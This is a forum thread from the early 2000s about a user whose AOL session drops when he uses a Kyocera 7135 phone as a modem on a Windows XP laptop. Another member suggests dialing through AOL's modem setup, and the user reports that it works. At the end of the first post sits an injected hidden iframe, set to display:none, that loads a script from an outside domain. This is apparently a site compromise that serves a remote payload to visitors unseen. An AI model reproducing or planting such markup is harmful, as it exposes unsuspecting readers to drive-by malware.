+ Reply to Thread
Results 1 to 6 of 6
  1. #1
    Registered User
    Join Date
    01-21-2003
    Location
    st louis mo
    Posts
    114

    aol and using the 7135 as a modem with winxp laptop

    when using my 7135 as a modem with my new sony vaio all works great, i can surf with IE and do all i need to do.but.....when i then launch aol,it connects fine and then logs me off aol about 1 minute later with no error message.it just says "goodbye".from that point on i cant use IE to browse anymore until i disconnect,then reconnect.it still shows me as connected but will no longer load/view web pages. if i dont log on to aol i have no problems. anyone have any thoughts? is this an aol issue? a verizon issue? or a kyo 7135 issue?,i could just blow off aol but my email is there and it takes longer to view it at aol .com<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    B.Andrew "Andy" Brown,MSW
    Executive Director,Camp Livingston.Inc

  2. #2
    Member CaptJCL's Avatar
    Join Date
    02-20-2003
    Location
    North Carolina
    Posts
    196
    I have an older Vaio running XP and I use aol 8.0. I sometimes have a problem connecting using QuickLink, but I can always connect using the phone as a a plain modem. Try connecting to aol first then load IE. I do this often and have few if any problems.

  3. #3
    Registered User
    Join Date
    01-21-2003
    Location
    st louis mo
    Posts
    114
    how do i do this,do i have aol dial the #777 where do i put my vzw username and password? currently i click the 7135 connection i created to intiate a connection,this is how kyo tech told me to do it,please explain the other option you mentioned.do you think this will stop aol from logging me off?
    B.Andrew "Andy" Brown,MSW
    Executive Director,Camp Livingston.Inc

  4. #4
    Member CaptJCL's Avatar
    Join Date
    02-20-2003
    Location
    North Carolina
    Posts
    196
    OK lets see if I can make this make sense. Plug your phone into the computer. If you are using the serial connection, close the hot sync manager on your computer. If you are using the USB connector, this is not necessary. On the phone tap the fax/modem icon. Then launch AOL. It should start searching for a modem. Once its finds the 7135 you should be in business. Just set it up with your local access numbers.
    Quick link dialing #777 is faster because it uses some compression. But it doesn't always work for me.
    Good luck.

  5. #5
    Registered User
    Join Date
    01-21-2003
    Location
    st louis mo
    Posts
    114
    seems to work fine after following your advice,it does seem slower but i have not been logged pff yet.guess when i need aol i will do it this way, when i just want to surf i will do it the other way,thanx for your help!
    B.Andrew "Andy" Brown,MSW
    Executive Director,Camp Livingston.Inc

  6. #6
    Member CaptJCL's Avatar
    Join Date
    02-20-2003
    Location
    North Carolina
    Posts
    196
    Glad it worked.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts